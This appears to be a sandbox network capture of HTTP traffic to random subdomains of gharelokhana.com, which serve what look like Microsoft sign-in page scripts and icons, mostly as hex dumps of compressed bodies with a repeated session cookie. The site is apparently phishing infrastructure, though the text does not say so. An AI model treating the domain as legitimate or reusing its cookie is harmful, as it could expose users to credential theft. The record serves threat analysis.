2024-12-04 16:37:47 UTC	2286	IN	Data Raw: 38 65 37 0d 0a 00 00 01 00 06 00 10 10 00 00 00 00 20 00 16 01 00 00 66 00 00 00 18 18 00 00 00 00 20 00 24 01 00 00 7c 01 00 00 20 20 00 00 00 00 20 00 35 01 00 00 a0 02 00 00 30 30 00 00 00 00 20 00 6a 01 00 00 d5 03 00 00 40 40 00 00 00 00 20 00 f3 01 00 00 3f 05 00 00 80 80 00 00 00 00 20 00 b5 01 00 00 32 07 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 dd 49 44 41 54 78 9c dd 92 31 4e 43 41 10 43 df cc 8e 44 40 b0 22 2d 65 6e c4 21 90 68 c3 15 38 40 ce c4 39 68 a8 11 22 e4 ff 00 05 93 35 4d 1a b2 bf 89 68 10 2e 2d 8d c7 b6 6c 9b eb 85 4c fc 80 50 d6 59 09 5e 6c 75 77 ff c8 95 d9 72 dc 28 cd 08 0e e0 87 c7 c7 c2 7f 77 fe 17 04 42 28 7b da 12 04 f2 26 01 46 02 a9 89 be a2 ce 4e ba 66 Data Ascii: 8e7 f $\| 500 j@@ ? 2PNGIHDRaIDATx1NCACD@"-en!h8@9h"5Mh.-lLPY^luwr(wB({&FNf
2024-12-04 16:37:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:46 UTC	759	OUT	GET /shared/1.0/content/js/asyncchunk/convergederror_customizationloader_7e45d168059bd2885d00.js HTTP/1.1 Host: 4cd0d823-53cae677.gharelokhana.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://fdgfhvcfdgfhhjh.gharelokhana.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: zQt4SK="NTNjYWU2NzctOTE3My00ZWNmLWEzYTMtYWY5ZTRiYjk3MmE5OmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
2024-12-04 16:37:48 UTC	807	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 16:37:47 GMT Content-Type: application/x-javascript Content-Length: 116321 Connection: close cache-control: public, max-age=31536000 last-modified: Thu, 15 Aug 2024 17:52:53 GMT etag: 0x8DCBD53169C0B8E x-ms-request-id: 59a0b5e7-701e-000b-448f-444f82000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding access-control-allow-origin: * x-azure-ref: 20241204T163747Z-15b54885d96b2wtthC1FRAycng00000005sg00000000cf1f x-fd-int-roxy-purgeid: 0 x-cache: TCP_HIT accept-ranges: bytes content-encoding: gzip
2024-12-04 16:37:48 UTC	13653	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ec 7d 5b 5b db 48 b6 e8 fb fe 15 b6 a6 c7 2d c5 85 b1 0c 18 90 11 1e 92 90 1e 66 92 c0 06 d2 3d 3d 84 c9 27 ec 32 56 62 24 8f 2e 5c 1a 7b ff f6 b3 d6 aa 2a a9 24 cb 60 d2 bd cf 79 38 d3 5f 07 eb 52 aa 7b ad fb 65 fd 55 fd bf 6a af 6a 6b ab ff 57 3b 3b 3f 38 3d af 1d bf ab 9d ff f5 e8 f4 6d ed 04 ee 7e ad 7d 3c 3e 3f 7a 73 b8 7a 3d d8 28 fe 3b 1f fb 71 6d e4 4f 78 0d 7e af bc 98 0f 6b 61 50 0b a3 9a 1f 0c c2 68 1a 46 5e c2 e3 da 0d fc 8d 7c 6f 52 1b 45 e1 4d 2d 19 f3 da 34 0a bf f2 41 12 d7 26 7e 9c c0 47 57 7c 12 de d5 4c a8 2e 1a d6 4e bc 28 79 a8 1d 9d 58 2d a8 9f 43 6d fe b5 1f c0 d7 83 70 fa 00 d7 e3 a4 16 84 89 3f e0 35 2f 18 52 6d 13 b8 09 62 5e 4b 83 21 8f 6a 77 63 7f 30 ae 7d f0 07 51 18 87 a3 a4 16 f1 01 f7 6f a1 91 Data Ascii: }[[H-f=='2Vb$.\{*$`y8_R{eUjjkW;;?8=m~}<>?zsz=(;qmOx~kaPhF^\|oREM-4A&~GW\|L.N(yX-Cmp?5/Rmb^K!jwc0}Qo
2024-12-04 16:37:48 UTC	16384	IN	Data Raw: f4 d3 9b f3 e3 53 e7 9a 9d 1e fe ed f0 cd f9 d1 f1 c7 2f 87 3f 1f 7e 3c 77 6e d9 d9 a7 d7 6f de 1f 9c 9d 1d 7d fc c9 79 78 49 10 be 62 8a d9 2c b2 6b b7 4b c9 f4 84 0a e3 99 74 6e b9 0c 19 58 a0 eb 38 13 20 17 23 df 1a f4 12 c5 36 a9 04 87 e2 01 ea 0a 31 e1 6b 82 c2 b8 00 0d b3 57 cf 85 ae a2 8e a2 1a a1 90 66 4b 6e 64 66 50 c0 b8 2c ba 7f a5 39 33 16 79 f1 8c 65 11 01 f3 b3 67 77 55 e2 0d 0a 1b fa 7c 76 1c c5 1b a2 02 1a f7 13 8a 3b 95 41 39 d2 9f 89 16 57 46 fa fa 0f 50 4d 88 42 5f 4a 9b 26 56 87 e4 c2 1a ca c1 88 88 f4 69 21 82 9e 28 fb 27 6c 4b 46 0b aa a1 78 3e 20 96 36 41 f5 59 2d e2 03 0e 47 27 7a 3e 03 4f 26 e6 f9 ff 25 64 dc ff b5 20 31 c5 1d a2 8b 29 97 b8 92 e5 11 26 be 37 2c c8 77 04 04 a1 be 54 c4 04 a9 8c 62 47 85 7f 7f 74 90 e2 48 e7 ff 09 Data Ascii: S/?~<wno}yxIb,kKtnX8 #61kWfKndfP,93yegwU\|v;A9WFPMB_J&Vi!('lKFx> 6AY-G'z>O&%d 1)&7,wTbGtH
2024-12-04 16:37:48 UTC	16384	IN	Data Raw: 1c 36 55 2b 8c c9 61 58 7a a0 58 c0 8f a7 00 a2 b1 60 b3 6d c3 85 f1 f0 37 03 2e 39 87 8b 8e b8 32 c1 92 d3 39 b6 83 c5 20 4a af 0a 87 1c e0 c0 76 f6 48 49 41 cf a2 1e 9c 4c 3e b2 72 58 93 38 46 3e 94 18 bb 88 ae f0 20 50 3e 83 04 e7 5c c3 d9 00 67 f4 f8 c8 bf f4 f8 d8 e2 65 16 da 5c 2b 82 9e 7c 09 1e c1 f8 23 6b b4 4d b0 93 d6 4a a8 1f 9d 4b a4 4a 4e 78 e9 68 c0 9b a5 83 ec d8 7a d9 06 6f ce 97 45 e0 47 87 2d 2b 0d 58 23 22 65 94 f1 26 16 b9 50 3a 70 e4 14 5f 7c 31 bb fa ca ec 67 10 bb 99 7b d0 86 b3 1d d6 90 ff b6 94 a8 f1 33 95 a8 79 ed 6e 5b d4 2e a2 c6 83 d7 93 4a cc fb 19 cf b7 13 a3 9c 95 a3 1e 81 db 0f 73 99 dd 2f 97 bc 7a 4c 62 5b 85 b9 cd 7f 19 af fe 4f b5 61 2c 1a c4 fe 25 cd 18 ff 54 18 87 00 13 74 f7 02 10 ff 26 b0 55 ee eb 0b 3a fe 54 64 76 Data Ascii: 6U+aXzX`m7.929 JvHIAL>rX8F> P>\ge\+\|#kMJKJNxhzoEG-+X#"e&P:p_\|1g{3yn[.Js/zLb[Oa,%Tt&U:Tdv
2024-12-04 16:37:48 UTC	16384	IN	Data Raw: 25 22 dd de f6 1e 3f 3b f7 50 e9 3e 0d 50 25 85 da 18 90 93 47 27 53 38 e8 81 0e 27 4d 63 b4 70 9a 26 cd 57 61 11 fe 10 47 b7 70 a2 26 4d 05 3c 38 4f d5 11 70 13 4c 0c 98 5d 05 33 e3 ea 1a e0 71 23 d0 80 5d 02 c3 75 c3 9c 2c ca e3 9f 51 33 21 61 ca 6e f9 83 eb f0 ee e5 02 c0 81 41 49 dd 2b f4 96 7e 93 14 70 d4 5f d0 65 2e 2e 8d 45 74 e1 0c 19 a2 36 ad 4e fd ca 30 2f 64 81 b0 8a 2c 99 25 f5 f1 a0 80 29 ac 5f c2 09 74 29 9c 26 4b 7b 0d 47 f6 1a c6 39 6a f3 b1 50 c3 88 07 4b 8c c9 d5 00 0b 88 3f 14 59 98 e4 d0 c8 ef 17 03 cc 26 88 ee ba 18 97 f5 f8 78 63 96 fb 44 eb f7 11 3d 59 e7 8f 92 80 f4 cf 2c 36 f2 09 5e 61 d0 ea 3a 30 95 b7 bd 07 0b 34 3e 2a 21 e7 46 99 d2 84 68 d0 c4 8d d9 95 26 4c c7 74 73 86 b3 3e 13 3f 13 34 1d dc bb 98 0d 90 7d 06 62 f5 f9 f0 b4 Data Ascii: %"?;P>P%G'S8'Mcp&WaGp&M<8OpL]3q#]u,Q3!anAI+~p_e..Et6N0/d,%)_t)&K{G9jPK?Y&xcD=Y,6^a:04>*!Fh&Lts>?4}b
2024-12-04 16:37:48 UTC	2731	IN	Data Raw: 7f 41 60 6d 16 15 48 02 60 5e 3e 0b 6d 77 5f d1 a3 85 25 8e a1 da 2c d0 9f aa d4 32 54 95 a1 5e 98 7f 3b 7f f5 d2 50 a0 60 ac 9e 75 a7 4d b1 f7 e6 b1 9b 62 18 f2 dc 83 53 67 7e 51 e2 d9 f8 a1 70 07 e5 00 f5 6a 27 11 25 e0 42 c6 4d 11 31 88 61 c9 93 0d ac dc f4 65 fc 64 6a 7e b2 b0 2b d3 81 fc 8d 9b b5 04 0b e6 25 50 85 cc 62 b5 8c 32 a1 d0 2a c5 fd 82 6a b6 13 7f 62 13 e0 25 ea fe d1 b3 4c 38 c6 bf f2 8d 94 bb 7d 9d 07 d4 e6 26 e5 d4 11 ec 8b 8e 0b 82 70 11 e2 0a d3 f9 42 44 b9 46 2c 5f be 31 ed ba b1 c3 fa f7 45 fc 03 95 e9 d6 e4 ac 80 9f ca a8 cc cd 7e 0b ce ea d6 bd 35 6d af 6f 1f cd 68 d5 18 2b 86 b6 bb a5 d1 b9 89 2f e2 61 8e 51 63 f0 0f 71 0b 0d c2 e7 5a cc 1b f4 3d 28 ff 42 14 b3 7c 7c 36 de ff 3d 4c dd 6f 4b 4b 57 0d 52 ff 48 2c 63 d6 c8 32 66 ff Data Ascii: A`mH`^>mw_%,2T^;P`uMbSg~Qpj'%BM1aedj~+%Pb2*jb%L8}&pBDF,_1E~5moh+/aQcqZ=(B\|\|6=LoKKWRH,c2f
2024-12-04 16:37:48 UTC	16384	IN	Data Raw: c2 ec c0 4f d2 29 12 91 82 92 79 a7 95 b5 80 2b 57 0b 3e b0 80 81 75 3c 33 ce 48 34 b0 76 9e 58 f5 6a 78 8f 3b 9e a2 e7 a0 df 7c 9b 6f 12 a3 5b c2 08 f4 db ab da 52 0a 2f 82 01 56 d5 2f 3c 30 a5 5b 3a 1a a4 5e d6 02 c6 a0 55 e9 3c 2d 77 5e 1b 1a dc 20 8e 97 15 3a 29 83 d1 88 dd a4 df a0 fe 65 3a 3b 46 cc 95 f8 45 f8 e4 fe 7f 27 fd 04 c1 12 d9 3a 82 90 d0 69 c5 85 2e 4a d9 ef b2 56 b4 00 c4 78 05 8f d3 6e e0 71 6a ac 01 f0 38 db 75 1e c7 0a ab 65 c0 e3 9c 55 ca 56 f0 10 cc 3f 50 7a 25 1f f5 44 1a fe 25 80 2d 92 48 f5 fa 51 d5 77 95 a2 d2 22 ae bb bf 8f 48 e1 8c f7 3f 69 f4 4a d8 ca 79 ea ef 1f 03 d0 9f f8 07 47 45 0c 6c 76 54 28 55 dd 75 0a 0b 0a a2 2e 32 6e 99 61 4b b5 b6 11 d1 d1 eb bf e2 45 fc 23 a2 86 85 39 ea 66 97 0e 7d b5 f1 98 ce 0e 9e cb 4d ba 1e Data Ascii: O)y+W>u<3H4vXjx;\|o[R/V/<0[:^U<-w^ :)e:;FE':i.JVxnqj8ueUV?Pz%D%-HQw"H?iJyGElvT(Uu.2naKE#9f}M
2024-12-04 16:37:48 UTC	16384	IN	Data Raw: 90 50 6c c8 d7 58 12 fa ee 2d 09 7d ab bb 19 a1 2f 89 78 53 42 df 3a 7a c3 f5 cd 91 ae 91 ad 8e 86 82 df b1 6a 2a 7b c7 4f 02 36 34 df 59 e1 08 ce b8 87 55 c0 a8 0f 53 44 0d 66 ac 91 85 c2 8a 8d a1 17 3d 81 2b fa c0 f5 8c d0 f6 08 28 26 d6 47 ab a3 48 4f db c5 f6 5b 36 3c e0 26 7a 23 9c 59 df 1c a5 ad 71 1d 20 c1 a9 dc 34 ef e6 73 4f f7 d3 d6 b8 01 3d 96 d6 b8 be e9 77 67 dc 1a d7 57 0c c3 98 78 db 37 53 e6 62 b1 da 6a c4 26 ec 86 63 2e 4a 27 a6 a7 2a 76 ee 5a be a1 0f f5 9b d2 04 39 38 ca ad 32 39 bc 69 4f 8a 45 36 06 e4 36 41 69 ee 08 a5 b9 34 fa ee e4 6a 99 a7 1d 6f c4 b3 12 ed 11 78 13 7b 1d e1 29 d6 a7 8d 8c 17 ff 4d f2 a3 fa 22 bf dd a8 08 37 47 b2 15 4c b9 39 36 d0 97 77 24 f1 dc 94 68 c0 7d ae c4 68 d6 0e 84 9b 23 6a 33 ee a8 72 d3 20 5d 2a 80 9a Data Ascii: PlX-}/xSB:zj{O64YUSDf=+(&GHO[6<&z#Yq 4sO=wgWx7Sbj&c.J'vZ9829iOE66Ai4jox{)M"7GL96w$h}h#j3r ]*
2024-12-04 16:37:48 UTC	16384	IN	Data Raw: e9 f5 f1 c5 c5 f1 9f d7 af 3f bd 79 73 7a 71 fd db d9 e9 ef 97 e8 fb 96 ff e5 b1 f2 25 9e 25 a4 8a 5e c0 78 a1 d5 34 fc 4e 85 be 83 86 c3 b5 e4 8b ed 19 da b9 67 01 ba af 88 3c 30 aa ce ea 78 b5 1a a7 57 c4 1c 6a 29 5b 23 21 0e 91 46 1f 94 77 51 c0 17 da c4 fa b8 8a 64 28 ea 14 ed 23 57 d1 46 0c 74 ed 77 df 73 87 5b bc b6 c6 8d 96 da bd 43 07 e0 90 20 ad d8 bb 32 fd 6e 0f 80 10 25 b4 40 15 ac 66 0e 99 42 0b b5 38 ef 92 cc f7 bb 4b ee 93 eb a0 08 12 2f 2d c9 01 e5 c6 c2 5d 14 25 a8 00 77 93 17 fb af 61 32 53 69 e6 8d e4 24 8c db d5 2d a3 6d 1d c1 28 7b 98 72 d4 ef 3a 0a 0e ef 51 46 0e 15 16 d2 22 a1 aa c1 85 5d ba b1 b1 b4 27 f0 80 0e 5c 0f 47 e2 2b ff 65 fa 9d ac 5a d3 0b 59 11 79 7e 1a f5 98 7e 17 ce 1f cd 9a f0 5d 6a d6 a4 0f e6 ae c8 f3 d3 c0 48 67 53 Data Ascii: ?yszq%%^x4Ng<0xWj)[#!FwQd(#WFtws[C 2n%@fB8K/-]%wa2Si$-m({r:QF"]'\G+eZYy~~]jHgS
2024-12-04 16:37:48 UTC	1633	IN	Data Raw: f0 bd d2 d1 13 72 55 94 f7 78 3f b9 4a 0c e3 fd ec 2a 61 8b f7 de 95 32 6b ef d3 e2 21 cf 24 ff 95 b6 2f 7f 8a 36 d9 b2 fe b3 54 44 ef dd 6b e2 10 fd 76 13 87 df 60 dc 40 7d a9 b0 6f 90 bd 29 98 39 50 e6 df 6f e9 50 1c e9 e2 2f ad bb bf b4 ee 8a 5a 77 65 c3 a0 3f c1 f4 25 fb 4f 98 29 fc 65 58 f3 5f 64 58 d3 e9 6c 6e b2 65 0d 39 e5 98 4a 77 1b 13 69 4f 33 5b 61 2c b3 d2 0c f8 d1 26 b2 c0 b8 66 45 93 18 e1 01 c1 b7 76 5b 9b ad 8d 8e 74 c9 4b 9e 13 32 96 1a 02 f3 78 c1 4e 29 c5 20 90 15 8f aa 0d 51 54 de 7b 74 b7 91 87 8e 7c f4 25 a0 f4 64 23 a1 27 1b fa d1 92 9e 6c e6 87 cc a1 d3 39 8a 34 55 26 dd 39 f4 33 1f ca 79 ea 9d cc 25 d5 1b f0 6a 89 3a e6 62 1b 3d b6 14 cf 5f 35 4e 58 3c b8 ce 58 13 47 a7 ea 70 65 e5 7a b2 a2 8b 09 27 65 ba cb 2c b2 4c a8 64 55 d9 Data Ascii: rUx?J*a2k!$/6TDkv`@}o)9PoP/Zwe?%O)eX_dXlne9JwiO3[a,&fEv[tK2xN) QT{t\|%d#'l94U&93y%j:b=_5NX<XGpez'e,LdU

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:46 UTC	802	OUT	GET /shared/1.0/content/images/check_small_48540c930333871c385fcba2c659ccdb.svg HTTP/1.1 Host: 4cd0d823-53cae677.gharelokhana.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://fdgfhvcfdgfhhjh.gharelokhana.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: zQt4SK="NTNjYWU2NzctOTE3My00ZWNmLWEzYTMtYWY5ZTRiYjk3MmE5OmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
2024-12-04 16:37:47 UTC	800	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 16:37:47 GMT Content-Type: image/svg+xml Transfer-Encoding: chunked Connection: close cache-control: public, max-age=31536000 last-modified: Wed, 24 May 2023 10:11:46 GMT etag: 0x8DB5C3F48118378 x-ms-request-id: 0349cb40-f01e-0053-0ad1-44dfcf000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding access-control-allow-origin: * x-azure-ref: 20241204T163747Z-16c5c9558c6gdx5mhC1DUS7w2400000005vg00000000rr03 x-fd-int-roxy-purgeid: 0 x-cache: TCP_HIT accept-ranges: bytes content-encoding: gzip
2024-12-04 16:37:47 UTC	1016	IN	Data Raw: 33 66 31 0d 0a 1f 8b 08 00 00 00 00 00 00 ff 5d 96 c1 8e dc 36 0c 86 ef 05 fa 0e c6 f4 ae 21 29 51 12 8b 4c 0e f5 75 f2 02 b9 15 c8 76 67 81 cd 6e d0 0c 32 79 fc 90 32 45 bb 3d d9 92 65 91 ff c7 9f b2 3f 7c ff f1 bc 3c 5e be dc 6f 97 13 e6 d3 72 7b 7a 79 be dd b7 fb 1f 2f 4f 8f bf de 7f 5e 4e b0 c0 82 79 b1 b9 7f 5e 5e 5f 2f a7 b7 f7 b7 a7 d3 f2 f3 eb eb db f7 cb e9 76 bf 7f fb f3 7c 7e 3c 1e e9 91 d3 fb bf cf 67 02 80 b3 6e 7c fa f8 fb 6f 1f be fd 7d bf 2d 5f 2e a7 4f 92 4a 2d b9 2e 39 b5 56 7b bd 22 24 c8 5c 97 92 72 e9 58 ae 9c a8 23 f1 22 09 81 b8 5c 29 c9 58 5f 53 eb 5c cb 35 27 d6 e5 45 c7 84 3a 1f eb 5b 12 16 a9 d7 ff ed ff f9 53 4d bc c0 da 12 48 ad 5d 25 b4 54 1b d1 a2 61 5b a7 de fa d2 13 51 d5 0c 20 91 a6 50 f3 da 35 14 88 2d c9 bd 11 34 cd 85 Data Ascii: 3f1]6!)QLuvgn2y2E=e?\|<^or{zy/O^Ny^^_/v\|~<gn\|o}-_.OJ-.9V{"$\rX#"\)X_S\5'E:[SMH]%Ta[Q P5-4
2024-12-04 16:37:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:46 UTC	796	OUT	GET /shared/1.0/content/images/close_790189870c9543725dc3f5a15fb25e46.svg HTTP/1.1 Host: 4cd0d823-53cae677.gharelokhana.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://fdgfhvcfdgfhhjh.gharelokhana.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: zQt4SK="NTNjYWU2NzctOTE3My00ZWNmLWEzYTMtYWY5ZTRiYjk3MmE5OmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
2024-12-04 16:37:47 UTC	800	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 16:37:47 GMT Content-Type: image/svg+xml Transfer-Encoding: chunked Connection: close cache-control: public, max-age=31536000 last-modified: Wed, 24 May 2023 10:11:46 GMT etag: 0x8DB5C3F4823AA6E x-ms-request-id: 2ef4f17a-001e-000a-74d1-44584c000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding access-control-allow-origin: * x-azure-ref: 20241204T163747Z-16c5c9558c6wphxjhC1DUSwtb800000004mg00000000s28b x-fd-int-roxy-purgeid: 0 x-cache: TCP_HIT accept-ranges: bytes content-encoding: gzip
2024-12-04 16:37:47 UTC	196	IN	Data Raw: 62 65 0d 0a 1f 8b 08 00 00 00 00 00 00 ff 75 8f c1 0e 82 30 0c 86 5f 65 a9 57 b2 75 23 62 30 1b 07 ef be 80 37 a2 93 2d 41 20 ac 61 3c be 9b 88 37 d3 26 ed df ef 4f 9b ea b0 74 6c 7d f5 43 30 e0 88 a6 b3 10 31 46 1e 4b 3e ce 9d 50 88 28 92 03 58 f4 0f 72 06 a4 02 e6 ac ef 1c 6d fd e2 6d bc 8c ab 01 64 c8 a4 4a 09 8d 26 4f bd 6d da 10 2c 05 2d 36 a5 67 7b a7 7f 5b 9e be ef 0d 0c e3 60 41 34 7a 6a c9 b1 87 81 6b c5 4f 45 55 48 55 48 c9 4b ac 7f 45 a5 69 62 bc aa 65 16 b8 83 23 2f 13 c1 22 83 0f c4 24 f3 f0 cb 31 bb 33 b8 ed 27 0f aa ca 91 af e6 37 9b 37 22 dd b4 90 0e 01 00 00 0d 0a Data Ascii: beu0_eWu#b07-A a<7&Otl}C01FK>P(XrmmdJ&Om,-6g{[`A4zjkOEUHUHKEibe#/"$13'77"
2024-12-04 16:37:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:49 UTC	551	OUT	GET /shared/1.0/content/images/check_small_48540c930333871c385fcba2c659ccdb.svg HTTP/1.1 Host: 4cd0d823-53cae677.gharelokhana.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: zQt4SK="NTNjYWU2NzctOTE3My00ZWNmLWEzYTMtYWY5ZTRiYjk3MmE5OmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
2024-12-04 16:37:50 UTC	800	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 16:37:49 GMT Content-Type: image/svg+xml Transfer-Encoding: chunked Connection: close cache-control: public, max-age=31536000 last-modified: Wed, 24 May 2023 10:11:46 GMT etag: 0x8DB5C3F48118378 x-ms-request-id: f8da40ec-c01e-0058-40d0-4424a4000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding access-control-allow-origin: * x-azure-ref: 20241204T163749Z-15b54885d96644sphC1FRAnatc000000064g00000000vu9g x-fd-int-roxy-purgeid: 0 x-cache: TCP_HIT accept-ranges: bytes content-encoding: gzip
2024-12-04 16:37:50 UTC	1016	IN	Data Raw: 33 66 31 0d 0a 1f 8b 08 00 00 00 00 00 00 ff 5d 96 c1 8e dc 36 0c 86 ef 05 fa 0e c6 f4 ae 21 29 51 12 8b 4c 0e f5 75 f2 02 b9 15 c8 76 67 81 cd 6e d0 0c 32 79 fc 90 32 45 bb 3d d9 92 65 91 ff c7 9f b2 3f 7c ff f1 bc 3c 5e be dc 6f 97 13 e6 d3 72 7b 7a 79 be dd b7 fb 1f 2f 4f 8f bf de 7f 5e 4e b0 c0 82 79 b1 b9 7f 5e 5e 5f 2f a7 b7 f7 b7 a7 d3 f2 f3 eb eb db f7 cb e9 76 bf 7f fb f3 7c 7e 3c 1e e9 91 d3 fb bf cf 67 02 80 b3 6e 7c fa f8 fb 6f 1f be fd 7d bf 2d 5f 2e a7 4f 92 4a 2d b9 2e 39 b5 56 7b bd 22 24 c8 5c 97 92 72 e9 58 ae 9c a8 23 f1 22 09 81 b8 5c 29 c9 58 5f 53 eb 5c cb 35 27 d6 e5 45 c7 84 3a 1f eb 5b 12 16 a9 d7 ff ed ff f9 53 4d bc c0 da 12 48 ad 5d 25 b4 54 1b d1 a2 61 5b a7 de fa d2 13 51 d5 0c 20 91 a6 50 f3 da 35 14 88 2d c9 bd 11 34 cd 85 Data Ascii: 3f1]6!)QLuvgn2y2E=e?\|<^or{zy/O^Ny^^_/v\|~<gn\|o}-_.OJ-.9V{"$\rX#"\)X_S\5'E:[SMH]%Ta[Q P5-4
2024-12-04 16:37:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:50 UTC	568	OUT	GET /shared/1.0/content/js/asyncchunk/convergederror_customizationloader_7e45d168059bd2885d00.js HTTP/1.1 Host: 4cd0d823-53cae677.gharelokhana.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: zQt4SK="NTNjYWU2NzctOTE3My00ZWNmLWEzYTMtYWY5ZTRiYjk3MmE5OmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
2024-12-04 16:37:52 UTC	813	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 16:37:52 GMT Content-Type: application/x-javascript Content-Length: 116321 Connection: close cache-control: public, max-age=31536000 last-modified: Thu, 15 Aug 2024 17:52:53 GMT etag: 0x8DCBD53169C0B8E x-ms-request-id: f41da8c1-b01e-001c-1808-469136000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding access-control-allow-origin: * x-azure-ref: 20241204T163750Z-16c5c9558c69m842hC1DUSkb9w000000021g000000009ry7 x-fd-int-roxy-purgeid: 4554691 x-cache: TCP_HIT accept-ranges: bytes content-encoding: gzip
2024-12-04 16:37:52 UTC	13647	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ec 7d 5b 5b db 48 b6 e8 fb fe 15 b6 a6 c7 2d c5 85 b1 0c 18 90 11 1e 92 90 1e 66 92 c0 06 d2 3d 3d 84 c9 27 ec 32 56 62 24 8f 2e 5c 1a 7b ff f6 b3 d6 aa 2a a9 24 cb 60 d2 bd cf 79 38 d3 5f 07 eb 52 aa 7b ad fb 65 fd 55 fd bf 6a af 6a 6b ab ff 57 3b 3b 3f 38 3d af 1d bf ab 9d ff f5 e8 f4 6d ed 04 ee 7e ad 7d 3c 3e 3f 7a 73 b8 7a 3d d8 28 fe 3b 1f fb 71 6d e4 4f 78 0d 7e af bc 98 0f 6b 61 50 0b a3 9a 1f 0c c2 68 1a 46 5e c2 e3 da 0d fc 8d 7c 6f 52 1b 45 e1 4d 2d 19 f3 da 34 0a bf f2 41 12 d7 26 7e 9c c0 47 57 7c 12 de d5 4c a8 2e 1a d6 4e bc 28 79 a8 1d 9d 58 2d a8 9f 43 6d fe b5 1f c0 